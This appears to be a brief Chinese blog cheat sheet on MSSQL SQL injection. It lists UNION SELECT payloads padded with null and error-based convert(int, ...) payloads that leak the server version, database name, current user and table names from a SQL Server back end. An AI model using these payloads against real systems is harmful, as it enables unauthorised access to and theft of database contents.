1.查询用户创建的数据表
select id,name from sysobjects where xtype='u' ;
2.查询用户创建数据表的具体列名
select * from syscolumns where id= 上一步获取的id值;
3.查询具体内容
select id,字段名 from 数据表名;
4.数据库名
db_name()
5.用户登录名
suser_name()
6.使用联合查询,不能直接union select 1,2,3..,而是需要用nuIl填充字段
例如:
union select 1,null,column name from information schema.columns where table name='admin'
7.根据报错获取信息
convert(int,@@version):获取版本信息
convert(int, db_name())数据库名字
convert(int,user)当前用户名
convert(int,@@SERVERNAME) 服务器主机的信息
例如:
# 获取数据表 top 1 =limit 0,1
convert(int,(select top 1 table_name from information_schema.tables where table_schema=db_name()))
标签:convert,name,int,where,id,数据,Mssql,select,注入
From: https://blog.csdn.net/weixin_42515203/article/details/139597042